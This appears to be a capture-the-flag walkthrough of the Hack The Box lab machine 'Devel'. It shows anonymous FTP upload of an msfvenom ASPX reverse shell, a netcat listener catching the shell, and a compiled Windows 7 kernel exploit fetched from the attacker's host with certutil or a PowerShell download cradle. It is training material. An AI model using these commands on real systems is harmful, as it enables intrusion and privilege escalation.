Devel

Devel HTB 2023 Walkthrough. Devel is relatively simple Windows machine and demonstrates the security risks associated with some default program configurations.

Scanning

Initial scan reveals, we have 2x ports open. Port 80 and port 21.

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sC -sV -O -T4 10.10.10.5  
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-07 00:53 EDT
Nmap scan report for 10.10.10.5
Host is up (0.19s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 08-07-23  05:09AM                 1398 cmd.aspx
| 03-17-17  05:37PM                  689 iisstart.htm
| 08-07-23  07:46AM                73802 metshell.exe
| 08-07-23  05:09AM                28160 nc.exe
| 08-07-23  07:45AM                15970 shell.aspx
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.71 seconds

Port 80 : we have IIS server
Port 21: Anonymous login is allowed

Web Enumeration

Visiting the site, we get the default IIS page.

Nothing appears with dirbusting as well.

┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -u http://10.10.10.5/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50    
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.5/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/08/07 01:03:31 Starting gobuster in directory enumeration mode
===============================================================
Progress: 87631 / 87665 (99.96%)
===============================================================
2023/08/07 01:10:03 Finished
===============================================================

FTP Enumeration

Getting FTP access is easy and we can see default IIS files in the ftp directory. Which means we can directly upload files to web directory and we can try local file inclusion.

Exploitation

So, we can simply upload an aspx shell and gain access.

Generate a shell

Create a reverse non staged backdoor with msfvenom

┌──(kali㉿kali)-[~/Desktop]
└─$ msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.29 LPORT=4444 -o reverse-shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2704 bytes
Saved as: reverse-shell.aspx

Initial Access

upload the shell

ftp> put reverse-shell.aspx 
local: reverse-shell.aspx remote: reverse-shell.aspx
229 Entering Extended Passive Mode (|||49173|)
125 Data connection already open; Transfer starting.
100% |**************************************************************************************************************************|  2742       13.07 MiB/s    --:-- ETA
226 Transfer complete.
2742 bytes sent in 00:00 (12.47 KiB/s)
ftp>

Now, open a netcat listener

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lnvp 4444
listening on [any] 4444 ...

visit the shell from the browser and we will get the shell.

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.5] 49174
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>

Privilege Escalation

Lets first get the system info.

c:\windows\system32\inetsrv>systeminfo
systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 ��
System Boot Time:          7/8/2023, 2:57:40 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     3.071 MB
Available Physical Memory: 2.423 MB
Virtual Memory: Max Size:  6.141 MB
Virtual Memory: Available: 5.496 MB
Virtual Memory: In Use:    645 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Local Area Connection 3
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5
                                 [02]: fe80::58c0:f1cf:abc6:bb9e
                                 [03]: dead:beef::915a:54b9:46fa:b83d
                                 [04]: dead:beef::58c0:f1cf:abc6:bb9e

Its windows 7 build 7600 which is very old
No hotfixes are applied
Machine is x86

Searcing Google for the build, we do get an exploit.

Download the exploit

Now compile it.

┌──(kali㉿kali)-[~/Desktop]
└─$ i686-w64-mingw32-gcc 40564.c -o checkmate.exe -lws2_32

Now run a python server and download it on the box.

┌──(kali㉿kali)-[~/Desktop]
└─$ python3 -m http.server 80                                                                                     
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.5 - - [07/Aug/2023 01:36:37] "GET /checkmate.exe HTTP/1.1" 200 -
10.10.10.5 - - [07/Aug/2023 01:36:41] "GET /checkmate.exe HTTP/1.1" 200 -

c:\Users\Public\Downloads>certutil -urlcache -f http://10.10.14.29:80/checkmate.exe checkmate.exe
certutil -urlcache -f http://10.10.14.29:80/checkmate.exe checkmate.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\Users\Public\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 137F-3971

 Directory of c:\Users\Public\Downloads

07/08/2023  08:42 ��    <DIR>          .
07/08/2023  08:42 ��    <DIR>          ..
07/08/2023  08:42 ��           240.005 checkmate.exe
               1 File(s)        240.005 bytes
               2 Dir(s)   4.676.771.840 bytes free

We could have used powershell to download the file as well.

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.30:9005/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

Now run it and we will become the root

PreviousForest NextMetasploitable 2

Last updated 1 year ago

┌──(kali㉿kali)-[~/Desktop] └─$ sudo nmap -sC -sV -O -T4 10.10.10.5 [sudo] password for kali: Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-07 00:53 EDT Nmap scan report for 10.10.10.5 Host is up (0.19s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 02:06AM <DIR> aspnet_client | 08-07-23 05:09AM 1398 cmd.aspx | 03-17-17 05:37PM 689 iisstart.htm | 08-07-23 07:46AM 73802 metshell.exe | 08-07-23 05:09AM 28160 nc.exe | 08-07-23 07:45AM 15970 shell.aspx |_03-17-17 05:37PM 184946 welcome.png | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft IIS httpd 7.5 |_http-title: IIS7 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%) OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012 Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%) No exact OS matches for host (test conditions non-ideal). Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 37.71 seconds

┌──(kali㉿kali)-[~/Desktop] └─$ gobuster dir -u http://10.10.10.5/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50 =============================================================== Gobuster v3.5 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.5/ [+] Method: GET [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.5 [+] Timeout: 10s =============================================================== 2023/08/07 01:03:31 Starting gobuster in directory enumeration mode =============================================================== Progress: 87631 / 87665 (99.96%) =============================================================== 2023/08/07 01:10:03 Finished ===============================================================

┌──(kali㉿kali)-[~/Desktop] └─$ msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.29 LPORT=4444 -o reverse-shell.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of aspx file: 2704 bytes Saved as: reverse-shell.aspx

ftp> put reverse-shell.aspx local: reverse-shell.aspx remote: reverse-shell.aspx 229 Entering Extended Passive Mode (|||49173|) 125 Data connection already open; Transfer starting. 100% |**************************************************************************************************************************| 2742 13.07 MiB/s --:-- ETA 226 Transfer complete. 2742 bytes sent in 00:00 (12.47 KiB/s) ftp>

┌──(kali㉿kali)-[~/Desktop] └─$ nc -lnvp 4444 listening on [any] 4444 ... connect to [10.10.14.29] from (UNKNOWN) [10.10.10.5] 49174 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>

c:\windows\system32\inetsrv>systeminfo systeminfo Host Name: DEVEL OS Name: Microsoft Windows 7 Enterprise OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Multiprocessor Free Registered Owner: babis Registered Organization: Product ID: 55041-051-0948536-86302 Original Install Date: 17/3/2017, 4:17:31 �� System Boot Time: 7/8/2023, 2:57:40 �� System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: X86-based PC Processor(s): 1 Processor(s) Installed. [01]: x64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 3.071 MB Available Physical Memory: 2.423 MB Virtual Memory: Max Size: 6.141 MB Virtual Memory: Available: 5.496 MB Virtual Memory: In Use: 645 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. [01]: vmxnet3 Ethernet Adapter Connection Name: Local Area Connection 3 DHCP Enabled: No IP address(es) [01]: 10.10.10.5 [02]: fe80::58c0:f1cf:abc6:bb9e [03]: dead:beef::915a:54b9:46fa:b83d [04]: dead:beef::58c0:f1cf:abc6:bb9e

┌──(kali㉿kali)-[~/Desktop] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.5 - - [07/Aug/2023 01:36:37] "GET /checkmate.exe HTTP/1.1" 200 - 10.10.10.5 - - [07/Aug/2023 01:36:41] "GET /checkmate.exe HTTP/1.1" 200 -

c:\Users\Public\Downloads>certutil -urlcache -f http://10.10.14.29:80/checkmate.exe checkmate.exe certutil -urlcache -f http://10.10.14.29:80/checkmate.exe checkmate.exe **** Online **** CertUtil: -URLCache command completed successfully. c:\Users\Public\Downloads>dir dir Volume in drive C has no label. Volume Serial Number is 137F-3971 Directory of c:\Users\Public\Downloads 07/08/2023 08:42 �� <DIR> . 07/08/2023 08:42 �� <DIR> .. 07/08/2023 08:42 �� 240.005 checkmate.exe 1 File(s) 240.005 bytes 2 Dir(s) 4.676.771.840 bytes free